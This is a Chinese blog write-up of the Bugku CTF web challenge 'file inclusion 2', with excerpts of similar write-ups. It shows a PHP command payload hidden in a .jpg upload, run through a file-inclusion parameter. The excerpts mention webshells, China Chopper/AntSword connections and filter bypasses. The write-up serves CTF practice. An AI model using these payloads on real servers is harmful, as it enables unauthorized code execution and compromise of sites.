bugku-Web 文件包含2

最新推荐文章于 2024-12-25 20:15:37 发布
原创 最新推荐文章于 2024-12-25 20:15:37 发布 · 596 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#bugku #web #文件包含

本文介绍了一种通过上传特殊构造的PHP文件,利用服务器上的upload.php漏洞来获取隐藏的Flag的方法。通过上传包含system(ls)命令的伪装文件,成功揭示了服务器上的文件结构,并最终找到了目标Flag。

打开网页查看源代码,在最上面发现upload.php,于是我们就访问这个文件:http://123.206.31.85:49166/index.php?file=upload.php

发现是让我们上传文件,然而,我们上传了并没什么用,但是下面说出了文件的位置。

这里我们构造一个文件再上传

创建一个文本文件并输入:<script language=php>system("ls")</script>,然后将文件后缀改为jpg,保存上传。

(system是调用系统命令,ls是查看当前文件夹的文件)

上传后我们访问文件所在位置:http://123.206.31.85:49166/index.php?file=upload/201812151107258968.jpg

看到一个txt文件,里面应该有flag,于是访问一下http://123.206.31.85:49166/index.php?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt

就拿到flag了。

 

注:也可用一句话+菜刀,不过可能上不去

bugku 文件包含2
hintll的博客
06-17 644
bugku 文件包含2 这个题启动环境五个金币,交flag给四个金币 直接开环境: 猜测是不是上传口被隐藏了 去看看源码: 有意外收获,提示了一个upload.php的文件 直接访问 找到上传口 那就传文件: 回显上传的文件不符合格式 只能上传图片格式的文件 那就该后缀名上传,然后再抓包改回来: 放包后还是一样的回显,那就应该是后端过滤 去路径下看一下: 发现php并没有解析,而且还将php语言的格式开头过滤了 那就绕过php的语言格式头试一下 上传后去路径下看一下: 是个空白的页面 尝试
bugku-web-文件包含2
qq_75121443的博客
04-14 883
啧啧啧,怎么说呢,这题出的挺诡异的,本来是考文件包含,结果不伦不类。这里试探结束,开始配合文件包含漏洞,上传图片。上传一个脚本,将图片后缀改为php。这就很离谱,上传的一句话居然用不了。提示是这个文件,访问这个文件。测试后后台为linux系统。各种绕过手法使用后无法绕过。上传成功,文件包含后发现。看到了第一行有一个注释。
Bugkuweb 文件包含2
qq_26961571的博客
09-10 337
打开这道题,到了文件包含时刻! ​ 打开链接看看 什么都没有啊,看看源代码 只有在第一行有提示,upload.php界面,看来需要进去看看了。 果不其然 需要上传文件,我们乖乖听话的话会怎么样呢?随便上传一个 然后呢?? 就是一个普通的图像,那么只有借助网络的力量,看看怎么做了。 网上大神说 <script language=php>system("ls")</script> 这句话保存为jpg格式上传就可以,是图...
bugku-文件包含2(文件包含漏洞)
烟敛寒林的博客
11-09 3655
本文介绍三种方法,还会讲到这道题菜刀的连接。 进入题目页面,没有什么特别的,只能右键查看源代码,发现提示需要跳转到 upload.php上传页面 方法一: ①新建一个txt文件写入 <script language=php>system("ls")</script> 后另存为 jpg 格式 ②选择浏览上传文件 ③访问 保存进去的文...
BugKu -------- 文件包含2
最新发布
2301_76746240的博客
12-25 412
ctfweb
[bugku]-文件包含2
weixin_52116519的博客
03-31 1343
考点:通过文件包含的方式读取其他目录下的文件按 1、查看源码,发现hint 2、文件上传点 3、上传1.png文件,抓包,修改内容为一句话木马 4、访问上传文件名,发现有过滤 5、绕过过滤,上传一句话木马 6、访问上传文件名,输出a,说明上传成功。接着getshell即可。 ...
Bugku---web---变量1
weixin_47450099的博客
04-28 1291
网络安全 Bugku---web---变量1
BUGKU--web详解
qq_49422880的博客
05-28 2306
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
Bugku -----Web-----全题目解析 (一) 超详细步骤
qq_48368964的博客
07-30 1715
在 Flask 中,双大括号 {{ }} 用于表示动态内容的占位符,该内容将由模板引擎渲染。当你在 Flask 模板中使用双大括号把变量或表达式括起来时,它告诉模板引擎去计算该表达式并将其值插入到渲染后的 HTML 文档中。例如,你提供的代码 flag={{config.SECRET_KEY}} 将会在 HTML 文档中的该位置渲染 Flask 应用程序的秘密密钥。比如要配置一个项目的SECRET_KEY,可以使用app.config['SECRET_KEY'] = "xxx"来进行设置。
bugku web-文件包含2
weixin_46578840的博客
09-06 270
打开网址看到一个CKCTF,就没了。审查源代码发现一个upload.php,且url有明显的用于包含文件的file,包含upload 提示只能上传图片,测试发现双后缀可绕过 包含一下这个文件,用蚁剑链接发现返回为空 菜刀也是一样,哎,换一种思路,这里既然有文件包含 上传 <script language='php'> system('ls') </script> 然后进行包含访问,what?这,人傻了 然后看了评论。。。直接包含flag就行了。。。。。 ...
Bugku WEB 文件包含2
qq_41696858的博客
07-21 355
和包含1的2解法基本上一模一样,多文件后缀加菜刀可解,就记几个新加的点吧 <?php?>被过滤,可以考虑用<?=?>或者 <script language=php></script>代替 菜刀直接连接会被拒绝,需要通过文件包含的路径去间接访问,可能是对upload设置了权限,不允许外部访问,也就是菜刀输路径的时候要形如index.php?file=这样去访问 忘了看源码就提交flag了,有兴趣的看一下upload.php的源码,相信会更清楚一点 参考视频链接:
Bugku web——文件包含2
qq_40481505的博客
10-16 1101
打开链接,看到链接形式为file=hello.php,因此首先尝试php文件包含 php://filter/read=convert.base64-encode/resource/hello.php 报错 php://input 报错 file://var/www/hello.php 没有报错,但也没有输出 data: text/plain,<?php echo 123; ?> ...
bugku ctf 文件包含2
qq_42777804的博客
08-08 4187
首先进去网站 发现是这么个东西       没有思路   只好右键查看源码   或 F12 发现注释文件upload.php,访问下来到文件上传页面 访问后发现     上传图片界面。。。 之后有两种方法!!!!!!!!!   1.     新建文档写入  &lt;script language=php&gt;system("ls")&lt;/script&gt;...
四十、BUGKU文件包含2
山兔的博客
09-13 392
打开网站没有看到什么东西,F12看到网站的html,在其中很明显有着一行代码,upload.php,我们有理由怀疑是文件上传。在查看一下源代码, view-source:http://114.67.246.176:12173/ index.php?file=hello.php ,没发现什么有意思的东西。 换一个域名访问,http://114.67.246.176:12173/index.php?file=upload.php,发现是一个文件上传的网站。 上传一句话木马的.jpg图片,内容为<?php
bugku---文件包含2(二次渲染)
LuckySec
11-30 3920
题目 http://123.206.31.85:49166/ 首先查看源码可以发现隐藏的文件名 我们访问该文件地址 我们上传一张图片马, 构造代码为 &amp;amp;amp;amp;lt;script language=php&amp;amp;amp;amp;gt;system(“ls”)&amp;amp;amp;amp;lt;/script&amp;amp;amp;amp;gt; 一开始我只是构造了一张普通的的图片马,进行上传 上传后页面可以看
Bugku CTF WEB解题技巧分享与讨论
WEB题目涉及的常见漏洞包括但不限于:SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造、SSRF服务器端请求伪造、文件包含、目录遍历、命令注入等。每种漏洞都有其特定的利用条件和方法。 - SQL注入:通过在SQL查询中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值